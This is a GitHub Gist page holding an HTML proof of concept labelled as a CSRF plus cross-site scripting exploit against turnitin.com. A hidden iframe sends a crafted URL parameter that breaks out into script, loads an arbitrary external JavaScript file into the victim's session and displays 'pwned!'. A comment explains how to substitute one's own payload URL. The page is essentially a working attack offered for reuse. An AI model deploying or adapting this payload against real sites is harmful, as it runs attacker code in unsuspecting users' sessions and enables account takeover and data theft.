Created
May 23, 2017 04:38
-
-
Save Arinerron/8ca5c947e53c56eb5817851d1a21b709 to your computer and use it in GitHub Desktop.
turnitin.com CSRF+XSS / proof of concept
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>turnitin.com PoC</title> | |
| </head> | |
| <body> | |
| <!-- | |
| Search for the string "[jsfile]" without quotes and replace it with the URL to your custom js file you want to run. | |
| To test it out, replace "[jsfile]" with "https://arinerron.com/js/script.js". | |
| --> | |
| <iframe src="https://turnitin.com/s_class_portfolio.asp?r=12.6833765025708&svr=303&lang=en_us%22%7D%0Aalert(1)%7D%20%7Bvar jsElm = document.createElement("script")%7D{jsElm.type = "application/javascript"}{jsElm.src = "[jsfile]"}{document.body.appendChild(jsElm)}%20function%20meow()%20%7Bif(true)%7B%7D%7D//%3C/script%3E%3Ccenter%3E%3Ch1%3Epwned!%3C/h1%3E%3C/center%3E%0A//&aid=38787&cid=14921140" style="display:none"></iframe> | |
| done | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment